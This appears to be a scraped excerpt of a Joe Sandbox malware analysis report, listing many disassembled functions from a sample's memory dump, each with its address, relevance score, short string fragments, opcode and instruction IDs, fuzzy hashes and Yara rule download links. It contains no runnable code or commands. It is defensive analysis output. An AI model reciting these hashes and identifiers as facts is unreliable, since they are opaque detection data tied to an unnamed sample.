                                                                                                                                                                                                                                                  • Associated: 00000008.00000002.3710267603.0000000000400000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000008.00000002.3710780342.000000000043F000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000008.00000002.3710849718.0000000000442000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000008.00000002.3710922934.0000000000453000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_8_2_400000_6f9ea40b81.jbxd
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                  • String ID: );?g$9nI9$;>*2$='0{$[93=$cba`$fa
                                                                                                                                                                                                                                                  • API String ID: 0-154584671
                                                                                                                                                                                                                                                  • Opcode ID: 3e51a02978bc99ce7d016768a4801fe2a924607298026115374562d3702a8947
                                                                                                                                                                                                                                                  • Instruction ID: 21be1e4f2e6752f9380b4aadbcf4cd787e7e0f4b09ea5b297d7e9ef9a1fb0c4b
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 3e51a02978bc99ce7d016768a4801fe2a924607298026115374562d3702a8947
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 3FC1077560C3A08FC3118F29D89066BBBE2AF96310F588A6DF4E1573D2C7398D45CB5A
                                                                                                                                                                                                                                                  Function 0042D085 Relevance: 6.6, Strings: 5, Instructions: 368COMMON
                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000008.00000002.3710377869.0000000000401000.00000020.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                  • Associated: 00000008.00000002.3710267603.0000000000400000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000008.00000002.3710780342.000000000043F000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000008.00000002.3710849718.0000000000442000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000008.00000002.3710922934.0000000000453000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_8_2_400000_6f9ea40b81.jbxd
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                  • String ID: #$0$AGsW$P$k
                                                                                                                                                                                                                                                  • API String ID: 0-1629916805
                                                                                                                                                                                                                                                  • Opcode ID: a92c176f258902a07af39c1f8e4a41f6c7503ef90e7a1abad74dc0064dca0dbd
                                                                                                                                                                                                                                                  • Instruction ID: 8816b6b3b95a3b8c405e0a0f8c285763547ceed8af8c8b555c70c7a9f783aa76
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: a92c176f258902a07af39c1f8e4a41f6c7503ef90e7a1abad74dc0064dca0dbd
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 1CC1F4317183918ED328CF39D4513ABBBD2AFD2304F68866ED4D58B2D1D6798449C71B
                                                                                                                                                                                                                                                  Function 0042B763 Relevance: 5.6, APIs: 1, Strings: 2, Instructions: 308COMMON
                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000008.00000002.3710377869.0000000000401000.00000020.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                  • Associated: 00000008.00000002.3710267603.0000000000400000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000008.00000002.3710780342.000000000043F000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000008.00000002.3710849718.0000000000442000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000008.00000002.3710922934.0000000000453000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_8_2_400000_6f9ea40b81.jbxd
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: FreeLibrary
                                                                                                                                                                                                                                                  • String ID: 3$qjjw
                                                                                                                                                                                                                                                  • API String ID: 3664257935-3235754969
                                                                                                                                                                                                                                                  • Opcode ID: 3641d3b1d95d9d0e2252580d4e70a4747529bd2a480d62c0a42bd322f018f1c7
                                                                                                                                                                                                                                                  • Instruction ID: e0248e225440bb7285b8803733d60271f7e61eb44642cbaa2f092a8799675a72
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 3641d3b1d95d9d0e2252580d4e70a4747529bd2a480d62c0a42bd322f018f1c7
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 29A16C717083919BE7248F24C8917ABBBD2EFD2340F18856ED5C94B3C6DB384405D796
                                                                                                                                                                                                                                                  Function 00415ADC Relevance: 4.1, Strings: 3, Instructions: 398COMMON
                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000008.00000002.3710377869.0000000000401000.00000020.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                  • Associated: 00000008.00000002.3710267603.0000000000400000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000008.00000002.3710780342.000000000043F000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000008.00000002.3710849718.0000000000442000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000008.00000002.3710922934.0000000000453000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_8_2_400000_6f9ea40b81.jbxd
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                  • String ID: 1/3T$WL$^Q
                                                                                                                                                                                                                                                  • API String ID: 0-4254228366
                                                                                                                                                                                                                                                  • Opcode ID: ba18f0a771fe5c943f6b46e4d9dfc1ae68c5ab374dcf48f97578f812035a9b14
                                                                                                                                                                                                                                                  • Instruction ID: 36620dcd79f832a97b090e2ed89ea61b800e286945c25bf48684ec17d430fe28
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: ba18f0a771fe5c943f6b46e4d9dfc1ae68c5ab374dcf48f97578f812035a9b14
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: A9D1CEB4100B01CFD7258F25C8A1BA3BBB1FF86314F19858DC8964F7A2D779A855CB94
                                                                                                                                                                                                                                                  Function 0041D074 Relevance: 2.7, Strings: 2, Instructions: 211COMMON
                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000008.00000002.3710377869.0000000000401000.00000020.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                  • Associated: 00000008.00000002.3710267603.0000000000400000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000008.00000002.3710780342.000000000043F000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000008.00000002.3710849718.0000000000442000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000008.00000002.3710922934.0000000000453000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_8_2_400000_6f9ea40b81.jbxd
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                  • String ID: pr$|~
                                                                                                                                                                                                                                                  • API String ID: 0-4145297803
                                                                                                                                                                                                                                                  • Opcode ID: ee8a3b8d263e0e2bc6467c896304b100a01db44200932090249312cc29dfec84
                                                                                                                                                                                                                                                  • Instruction ID: 1c71e515e24bd4364ede3925d09e369eeeaf8989eca5e2d791649c7508655d54
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: ee8a3b8d263e0e2bc6467c896304b100a01db44200932090249312cc29dfec84
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: E451F0B0A0C3509BD7008F24D8127ABB7F1EF92319F1885AEE4C55B391E7399642CB5E
                                                                                                                                                                                                                                                  Function 0041D087 Relevance: 2.7, Strings: 2, Instructions: 207COMMON
                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000008.00000002.3710377869.0000000000401000.00000020.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                  • Associated: 00000008.00000002.3710267603.0000000000400000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000008.00000002.3710780342.000000000043F000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000008.00000002.3710849718.0000000000442000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000008.00000002.3710922934.0000000000453000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_8_2_400000_6f9ea40b81.jbxd
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                  • String ID: pr$|~
                                                                                                                                                                                                                                                  • API String ID: 0-4145297803
                                                                                                                                                                                                                                                  • Opcode ID: 1cbfd2780bc33f3a437b09008cb0e627c906c1623d91543066de9fab292285fd
                                                                                                                                                                                                                                                  • Instruction ID: b30244ed6a2ff3de417c81c30de102dda9fa652a451c4e072b4a3ececf8c80cf
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 1cbfd2780bc33f3a437b09008cb0e627c906c1623d91543066de9fab292285fd
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: B751F4B460C3509BD7009F24C8126ABB7F1EF92315F1885ADE4C55B391E739D642CB5E
                                                                                                                                                                                                                                                  Function 0042536C Relevance: 2.7, Strings: 2, Instructions: 185COMMON
                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000008.00000002.3710377869.0000000000401000.00000020.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                  • Associated: 00000008.00000002.3710267603.0000000000400000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000008.00000002.3710780342.000000000043F000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000008.00000002.3710849718.0000000000442000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000008.00000002.3710922934.0000000000453000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_8_2_400000_6f9ea40b81.jbxd
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                  • String ID: BLJB$X
                                                                                                                                                                                                                                                  • API String ID: 0-2222927247
                                                                                                                                                                                                                                                  • Opcode ID: 85d985c10c38fb94c5f45cecc72a4b56871a758ab7e71e90a7e49e993c96917b
                                                                                                                                                                                                                                                  • Instruction ID: 1af2eb929763e148cb4abff1c4585c52a2657f08fe5d59f4d12d45bf37d2de30
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 85d985c10c38fb94c5f45cecc72a4b56871a758ab7e71e90a7e49e993c96917b
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 13515531708B618BD730DE6894412FBBBE1DF55350F984A3ED8D987382E23CA545E74A
                                                                                                                                                                                                                                                  Function 00427653 Relevance: 2.6, Strings: 2, Instructions: 86COMMON
                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000008.00000002.3710377869.0000000000401000.00000020.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                  • Associated: 00000008.00000002.3710267603.0000000000400000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000008.00000002.3710780342.000000000043F000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000008.00000002.3710849718.0000000000442000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000008.00000002.3710922934.0000000000453000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_8_2_400000_6f9ea40b81.jbxd
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                  • String ID: H.s $ij
                                                                                                                                                                                                                                                  • API String ID: 0-4017226643
                                                                                                                                                                                                                                                  • Opcode ID: 2cb1b7f925fbc6c9f7264a4edce0ffabfea3ec399ad5ab8651c95cdd20c1a345
                                                                                                                                                                                                                                                  • Instruction ID: ae217f9daa6f4cce8b7d259f4259de876ba9e86de0ba8af5ed87a71d833a3b47
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 2cb1b7f925fbc6c9f7264a4edce0ffabfea3ec399ad5ab8651c95cdd20c1a345
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 0F31DEB260D3908FD314CF65D48165FBBE2EBC6704F55892DE4C56B340CBB49906CB46
                                                                                                                                                                                                                                                  Function 00415EE0 Relevance: 1.9, Strings: 1, Instructions: 625COMMON
                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000008.00000002.3710377869.0000000000401000.00000020.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                  • Associated: 00000008.00000002.3710267603.0000000000400000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000008.00000002.3710780342.000000000043F000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000008.00000002.3710849718.0000000000442000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000008.00000002.3710922934.0000000000453000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_8_2_400000_6f9ea40b81.jbxd
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: InitializeThunk
                                                                                                                                                                                                                                                  • String ID: 1/3T
                                                                                                                                                                                                                                                  • API String ID: 2994545307-3266294232
                                                                                                                                                                                                                                                  • Opcode ID: db788342ad88ef6c488a899aa4db307fe01876e7341283b38dbf2834c16ac000
                                                                                                                                                                                                                                                  • Instruction ID: ff65059a960126ae2aa6a0ba82ae0d71c7a8e5e6bd522a8814a62b27b48fd42c
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: db788342ad88ef6c488a899aa4db307fe01876e7341283b38dbf2834c16ac000
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 37F1E134204741CFE7258F29D891BB3BBA2FB5A301F1945ADD5D68B392C739E881CB58
                                                                                                                                                                                                                                                  Function 00414F08 Relevance: 1.9, Strings: 1, Instructions: 609COMMON
                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000008.00000002.3710377869.0000000000401000.00000020.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                  • Associated: 00000008.00000002.3710267603.0000000000400000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000008.00000002.3710780342.000000000043F000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000008.00000002.3710849718.0000000000442000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000008.00000002.3710922934.0000000000453000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_8_2_400000_6f9ea40b81.jbxd
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                  • String ID: cba`
                                                                                                                                                                                                                                                  • API String ID: 0-1926275841
                                                                                                                                                                                                                                                  • Opcode ID: ac233faae9877bc3ddc3a70347ef5b8a5b0ef2ad5a4fd7cdd570c427d15c7cae
                                                                                                                                                                                                                                                  • Instruction ID: b0755fcd4efdf1967727a5f4be91126eb1e252dcdfc562f5600afc0ab194aa5f
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: ac233faae9877bc3ddc3a70347ef5b8a5b0ef2ad5a4fd7cdd570c427d15c7cae
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 9402FE34608300EFD7149F24D962BABB7B1FB9A304F94582DF481972A2D775EC45CB8A
                                                                                                                                                                                                                                                  Function 0042A630 Relevance: 1.6, Strings: 1, Instructions: 396COMMON
                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000008.00000002.3710377869.0000000000401000.00000020.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                  • Associated: 00000008.00000002.3710267603.0000000000400000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000008.00000002.3710780342.000000000043F000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000008.00000002.3710849718.0000000000442000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000008.00000002.3710922934.0000000000453000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_8_2_400000_6f9ea40b81.jbxd
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                  • String ID: "
                                                                                                                                                                                                                                                  • API String ID: 0-123907689
                                                                                                                                                                                                                                                  • Opcode ID: 4abfa2479a0e4305d02d5d5ee4678300abeb872efe24ce69da09627c08f165b8
                                                                                                                                                                                                                                                  • Instruction ID: f813c1fc85afd7223dda0e36a8c027de47e21e6ca96e88e37e758e8b14c45e64
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 4abfa2479a0e4305d02d5d5ee4678300abeb872efe24ce69da09627c08f165b8
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 03C113B2B043215BD7149E25E44076BB7E5AF84310F59892FEC9687382E738DC59C78B
                                                                                                                                                                                                                                                  Function 00417190 Relevance: 1.6, Strings: 1, Instructions: 375COMMON
                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000008.00000002.3710377869.0000000000401000.00000020.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                  • Associated: 00000008.00000002.3710267603.0000000000400000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000008.00000002.3710780342.000000000043F000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000008.00000002.3710849718.0000000000442000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000008.00000002.3710922934.0000000000453000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_8_2_400000_6f9ea40b81.jbxd
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                  • String ID: RuA
                                                                                                                                                                                                                                                  • API String ID: 0-3286949753
                                                                                                                                                                                                                                                  • Opcode ID: d354970e6102b2f6e14b23a1e4f96fce490ba8160eb9c464f18d88e9fbdd3b3e
                                                                                                                                                                                                                                                  • Instruction ID: 812d55878a62f6fab66defe66c88ae53172d99736bf38563795d352ae53827f1
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: d354970e6102b2f6e14b23a1e4f96fce490ba8160eb9c464f18d88e9fbdd3b3e
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 8CB10234208701CFE7258F29D851B73B7F2EB4A711F1489ADD4968B392D738A882CB58
                                                                                                                                                                                                                                                  Function 0042AAD0 Relevance: 1.5, Strings: 1, Instructions: 236COMMON
                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000008.00000002.3710377869.0000000000401000.00000020.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                  • Associated: 00000008.00000002.3710267603.0000000000400000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000008.00000002.3710780342.000000000043F000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000008.00000002.3710849718.0000000000442000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000008.00000002.3710922934.0000000000453000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_8_2_400000_6f9ea40b81.jbxd
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                  • String ID: "
                                                                                                                                                                                                                                                  • API String ID: 0-123907689
                                                                                                                                                                                                                                                  • Opcode ID: 08379c2cfec4ee4560f7149afc2674de524dbb751cb7c6d8c58db735b762b861
                                                                                                                                                                                                                                                  • Instruction ID: 1b0d155936ea343f35509df964668f6b6c6c9246b28269455b7de3af52c0cfb1
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 08379c2cfec4ee4560f7149afc2674de524dbb751cb7c6d8c58db735b762b861
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: D271E632B183254BD714CE28E58031BBBE3ABC5710F99856EE9949B391D238EC55C78B
                                                                                                                                                                                                                                                  Function 0042B4BB Relevance: 1.4, Strings: 1, Instructions: 138COMMON
                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000008.00000002.3710377869.0000000000401000.00000020.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                  • Associated: 00000008.00000002.3710267603.0000000000400000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000008.00000002.3710780342.000000000043F000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000008.00000002.3710849718.0000000000442000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000008.00000002.3710922934.0000000000453000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_8_2_400000_6f9ea40b81.jbxd
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                  • String ID: CUUI
                                                                                                                                                                                                                                                  • API String ID: 0-173970609
                                                                                                                                                                                                                                                  • Opcode ID: 11d751ef2c6838004d4261e70f5839909a1e0ffe6a220f83fd188cfbbc9468dc
                                                                                                                                                                                                                                                  • Instruction ID: 633f9cfe08b78efd1148aada0c0c4a0bea52aba14bf5254293374e99ea80dff2
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 11d751ef2c6838004d4261e70f5839909a1e0ffe6a220f83fd188cfbbc9468dc
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 9541E7A020C7E08ADB358F2594903ABBBE1DFD3304F5884ADC6C56B243C77988068B5A
                                                                                                                                                                                                                                                  Function 00425230 Relevance: 1.3, Strings: 1, Instructions: 96COMMON
                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000008.00000002.3710377869.0000000000401000.00000020.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                  • Associated: 00000008.00000002.3710267603.0000000000400000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000008.00000002.3710780342.000000000043F000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000008.00000002.3710849718.0000000000442000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000008.00000002.3710922934.0000000000453000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_8_2_400000_6f9ea40b81.jbxd
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: InitializeThunk
                                                                                                                                                                                                                                                  • String ID: cba`
                                                                                                                                                                                                                                                  • API String ID: 2994545307-1926275841
                                                                                                                                                                                                                                                  • Opcode ID: e363ae243e25186fafc727a7c143fe84283cddf713b74be5aabea9aa04b6da8b
                                                                                                                                                                                                                                                  • Instruction ID: beb69707a00ddb1e0f288a180930159145dfafadf277c1aff9f3426dfcb85bde
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: e363ae243e25186fafc727a7c143fe84283cddf713b74be5aabea9aa04b6da8b
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 47113536A44B204BC324CE289DC163777E1AB95314F95263DDCA9D33A1E278EC009AD9
                                                                                                                                                                                                                                                  Function 0043CAC0 Relevance: .5, Instructions: 548COMMON
                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000008.00000002.3710377869.0000000000401000.00000020.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                  • Associated: 00000008.00000002.3710267603.0000000000400000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000008.00000002.3710780342.000000000043F000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000008.00000002.3710849718.0000000000442000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000008.00000002.3710922934.0000000000453000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_8_2_400000_6f9ea40b81.jbxd
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                                  • Opcode ID: 86b120d65a92fc5bdbbef3624e805ea907a676f62533a2aebf6e078355a3b7f7
                                                                                                                                                                                                                                                  • Instruction ID: a0fb517757f1b8da7777bae7579d9f52a382c29ac2183c4fd28747a7d9f1db1e
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 86b120d65a92fc5bdbbef3624e805ea907a676f62533a2aebf6e078355a3b7f7
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: F402127AB04216CFC704CF28E8906AAB7F2FB8A311F1A847ED58593351D734AD55CB86
                                                                                                                                                                                                                                                  Function 0043CBD6 Relevance: .5, Instructions: 461COMMON
                                                                                                                                                                                                                                                  Download Yara Rule
